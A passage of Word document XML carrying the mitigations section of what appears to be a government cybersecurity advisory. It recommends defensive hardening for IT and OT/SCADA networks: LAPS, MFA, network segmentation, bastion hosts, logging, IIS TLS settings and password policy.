          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">For example, organizations can deploy Microsoft LAPS (see Microsoft Learn's Windows LAPS Overview for more information) to ensure each machine has a unique, complex local administrator password; passwords are rotated </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>automatically within Microsoft Active Directory, reducing the window of vulnerability; and that password retrieval is limited to authorized personnel only.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Require phishing-resistant multifactor authentication (MFA) [CPG 2.H] in addition to unique passwords for all administrative access, including local- and domain-level administrator accounts, RDP sessions, and VPN connections. Use privileged access workstations (PAWs) dedicated solely for administrative tasks and isolate them from the internet and general network to reduce exposure to threats and lateral movement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Harden PAWs by applying CIS Benchmarks: limit software to essential administrative functions, disable unnecessary services and ports, and ensure regular updates and patches.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enforce strict access controls to restrict PAW access to authorized administrators only.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Conduct continuous auditing of privileged accounts by regularly collecting and analyzing logs of administrative activities, such as login attempts, command executions, and configuration changes [CPG 2.T].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure automated alerts for anomalous behaviors, including logins outside standard hours, access from unauthorized locations, and repeated failed logins.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Periodically review all administrator accounts to confirm the necessity and appropriateness of access levels; align these auditing practices with NIST SP 800-53 Rev. 5 Controls AU-2 (Auditable Events) and AU-12 (Audit Record Generation).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Apply the principle of least privilege by limiting administrative privileges to the minimum required for users to perform their roles [CPG 2.E]. Create individual administrative accounts with unique credentials and role- specific permissions and disable or rename built-in local administrator accounts to reduce common attack vectors.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Avoid using shared administrator accounts to improve accountability and auditability, and ensure administrators use standard accounts for non- administrative tasks to minimize credential exposure.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement Role-Based Access Control (RBAC) to assign permissions based on job functions, as aligned with NIST SP 800-53 Rev. 5 Control AC-5 (Separation of Duties).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Identify and remove unauthorized or unnecessary local administrator accounts, maintain oversight by documenting and tracking all authorized accounts, and enforce strict account management policies by restricting account creation privileges and implementing approval workflows for new administrator accounts. Securely Store and Manage Credentials Purge credentials from the System Center Configuration Manager (SCCM). Review SCCM packages, task sequences, and scripts to ensure that no plaintext credentials are embedded, and update or remove any configurations that deploy scripts with plaintext credentials.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Do not store plaintext credentials in scripts. Instead, store credentials in a secure manner, such as with a credential/password manager or vault, or other privileged account management solution [CPG 2.L].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Leverage SCCM's built-in capabilities to run tasks with administrative privileges without exposing credentials (for further guidance, refer to Microsoft's best practices for secure SCCM configuration).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use encrypted communication. If scripts must retrieve credentials at runtime, use encrypted channels and protocols (e.g., TLS 1.3) to communicate with secure credential stores. Ensure that credentials are not written to disk or exposed in logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use unique local administrator passwords, such as by deploying Microsoft LAPS. Set appropriate permissions on Active Directory attributes used by LAPS (ms-MCS-AdmPwd and ms-MCS-AdmPwdExpirationTime) per Microsoft's security recommendations. Establish Network Segmentation Between IT and OT Environments Assess the existing network architecture to ensure effective segmentation between the IT and OT networks [CPG 2.F]-this process should evaluate both logical and physical segmentation, ensuring clear boundaries between IT and OT assets.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use NIST SP 800-82 Rev. 3 (Guide to OT Security) and International Electrotechnical Commission (IEC) 62443 standards as guides for network segmentation best practices.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Network segmentation is essential for containing breaches within isolated segments and preventing them from spreading across networks. Depending on your environment, consider implementing the following segmentation: Implement VLAN segmentation with inter-VLAN access controls.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create separate VLANs for IT and OT systems, specifically isolating OT components such as SCADA systems from IT network VLANs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure inter-VLAN access controls, including Layer 3 ACLs, to restrict traffic between IT and SCADA VLANs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy firewalls with application-layer filtering capabilities to monitor and control data flow between the VLANs, ensuring that only authorized protocols and devices can communicate across segments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement a demilitarized zone (DMZ) between IT and OT environments to provide an additional security layer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Position firewalls at both the IT-DMZ and OT-DMZ boundaries to filter traffic and enforce strict communication policies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure the DMZ to act as an intermediary, with only essential communications permitted between IT and OT networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure the DMZ hosts shared services (e.g., bastion hosts, jump servers, or data historians) that require limited interaction with both environments, with access controls and monitoring in place.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider a full network re-architecture if current segmentation methods cannot effectively separate IT and OT networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Collaborate with cybersecurity and network experts to design an architecture that meets ICS-specific security requirements-this redesign may involve transitioning to a micro-segmented or zero trust architecture, which includes </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>strict identity verification for all users and devices attempting to access OT assets.[3] Implement unidirectional gateways (data diodes) where appropriate to prevent bidirectional communication.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Keep network diagrams, configuration files, and asset inventories up to date. Regularly test segmentation controls to validate their effectiveness in restricting unauthorized access by conducting penetration testing and security assessments.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Include simulated breach scenarios to confirm that segmentation contains threats within isolated zones.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure compliance with NIST SP 800-53 Rev. 5 Control AC-4 (Information Flow Enforcement) to align segmentation measures with best practices for controlled information flow. Prevent Unauthorized Access via Port 21 Disable File Transfer Protocol (FTP) services on SCADA devices and servers if they are not required. Replace FTP with secure alternatives, such as SSH FTP (SFTP) or FTP over TLS/SSL (FTPS).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Block inbound and outbound FTP traffic on port 21 using firewalls and ACLs. Implement restrictive ACL policies at network boundaries to control FTP access across all network layers.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>As outlined in CIS Control 9.2 (Limit Unnecessary Ports, Protocols, and Services), close any unused ports to strengthen network defenses.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement IDS/Intrusion Prevention System (IPS) technologies to monitor traffic between the IT network and SCADA VLAN, use signature and anomaly detection, and integrate IDS/IPS with a SIEM system for centralized monitoring.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Enhance authentication and encryption mechanisms. Require MFA for SCADA access, use secure remote access technologies when necessary, securely encrypt communications (using protocols such as TLS 1.2 or higher, preferably TLS 1.3), and establish VPN tunnels to communicate between IT networks and SCADA systems.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Perform network traffic filtering and deep packet inspection.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use SCADA-aware firewalls capable of understanding SCADA protocols and inspecting and filtering traffic at the application layer.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Only allowlist authorized protocols and command structures to SCADA operations. Use one-way communication devices to prevent data from flowing back into the SCADA network. Establish Secure Bastion Hosts for OT Network Access Ensure bastion hosts are dedicated secure access points exclusively used to access the OT network and deployed as exclusive management gateways for all devices within a network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Make bastion hosts the single access points for conducting all administrative tasks, system management, and configuration changes; this centralizes access control and ensures any interaction with the OT system passes through a rigorously monitored and secure environment, minimizing the potential for unauthorized access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Do not allow staff to use bastion hosts as regular workstations.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Provide staff with separate workstations for accessing email, internet browsing, etc., on the IT network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Establish and enforce policies that prohibit non-administrative activities on bastion hosts, ensuring they remain dedicated to OT network access. Regularly audit and monitor bastion hosts to maintain security integrity, prevent unauthorized use, and quickly address any vulnerabilities or policy non-compliance.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure comprehensive logging of all activities on bastion hosts, including authentication attempts, command executions, configuration changes, and file transfers. Aggregate logs into a SIEM.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Isolate bastion hosts from the IT network; bastion hosts should reside in a separate security zone with restricted communication pathways (see CISA's infographic on Layering Network Security Through Segmentation).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Deploy bastion hosts in a DMZ, imposing physical and logical isolation from other networks.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Configure firewalls between the IT network, bastion hosts, and the OT network, enforcing strict access control policies to allow only necessary traffic.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure secure configuration and hardening of bastion hosts: Comply with NIST SP 800-123 and CIS Benchmarks and CNSSI 4009-2015, remove nonessential applications and services to reduce the attack surface, configure system settings to be secure, conduct effective patch management, enforce the principle of least functionality, and disable unused ports and protocols. Implement access control policies: remove any access permissions to the OT network from IT workstations and ensure only bastion hosts have access to the OT network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement NAC solutions to enforce policy-driven access control decisions based on device compliance and user authentication to provide dynamic access control and real-time visibility into the devices on the network. Equip each bastion host with robust authentication mechanisms, including phishing resistant MFA [CPG 2.H], to verify the identity of users accessing the network.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Align with AAL3 as defined in NIST SP 800-63B. AAL3 requires hardware-based authenticators and proof of possession of cryptographic keys through secure authentication protocols.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Implement stringent access controls that restrict access to authorized personnel only using RBAC principles, ensuring that personnel can only access information and perform tasks pertinent to their roles and duties. This reduces the risk of internal threats or lateral movement and prevents unauthorized access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Securely configure remote access tools, including by using secure protocols and disabling remote access tools on IT workstations to the OT network, enforcing that all remote access occurs through bastion hosts.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable insecure protocols like Telnet and unencrypted VNC to prevent interception and unauthorized access.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Log all remote access sessions and monitor for unauthorized or anomalous activities. Implement Comprehensive Logging, Log Retention, and Analysis Implement comprehensive and verbose (i.e., detailed) logging across all systems, including workstations, servers, network devices, and security appliances [CPG 2.T].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Enable logging of critical events such as authentication attempts, command- line executions with command </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>arguments (Event ID 4688), and network connections.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Aggregate logs in an out-of-band, centralized location [CPG 2.U] where adversaries cannot tamper with them, such as a dedicated SIEM, in order to facilitate behavior analytics, anomaly detection, and proactive threat hunting [CPG 2.T, 2.U]. For more information on behavior- and anomaly-based detection techniques, see joint guidance Identifying and Mitigating Living off the Land.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Ensure comprehensive logging on bastion hosts for all activities. Capture detailed records of login attempts [CPG 2.G], commands executed (with command arguments enabled), configurations changed, and files transferred. Integrate bastion hosts with a centralized SIEM (NIST SP 800-137).</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Continuously monitor logs for early detection of anomalous activities. Configure the SIEM to generate automatic alerts for suspicious activity and implement behavior analysis techniques to detect anomalies.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Securely store log backups and use tamper resistant storage [CPG 2.U] to prevent a threat actor from altering or purging logs to conceal malicious activity.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additional guidance on logging, see joint guidance Best Practices for Event Logging and Threat Detection. Securely Configure HTTPS Bindings and LocalSqlServer Connection String Enforce both client certificate verification and secure renegotiation in IIS by configuring the sslFlags setting to "3" in the ApplicationHost.config file. Setting sslFlags="3" requires clients to present valid X.509 certificates for authentication and implements the TLS Renegotiation Indication Extension (RFC 5746). To implement this, perform the following steps: Locate the &lt;binding&gt; element for the HTTPS site within ApplicationHost.config.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Set the sslFlags attribute to "3": &lt;binding protocol="https" bindingInformation="*:443:" sslFlags="3" /&gt;.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restart IIS to apply the changes: iisreset.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Restrict the server to use only secure and up-to-date SSL/TLS protocols and cipher suites.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Disable deprecated protocols like SSL 2.0, SSL 3.0, TLS 1.0, and TLS 1.1 to prevent protocol downgrade attacks that compromise the confidentiality and integrity of data.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Override the global settings in machine.config by modifying each application's web.config file to define its own connection strings and providers. This isolates applications at the database level and allows for tailored security configurations for each application.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Create dedicated SQL Server database accounts for each application with permissions limited to necessary operations (e.g., SELECT, INSERT, UPDATE), and avoid granting excessive privileges.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Do not assign roles like db_owner or sysadmin to application accounts. This reduces the risk of privilege escalation and enhances accountability through segregated access logs.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Use machine.config only for configurations that must be applied globally across all applications on the server.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Audit the machine.config file to ensure no application-specific settings are present. Enforce Strong Password Policies Implement a system-enforced policy that requires a minimum password length of 15 or more characters for all password-protected IT assets and all OT assets, when technically feasible [CPG 2.B].</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Consider leveraging passphrases and password managers to make it easier for users to maintain sufficiently long passwords.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>In instances where minimum password lengths are not technically feasible, apply and record compensating controls, such as rate-limiting login attempts, account lockout thresholds, and strong network segmentation. Prioritize these systems for upgrade or replacement.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
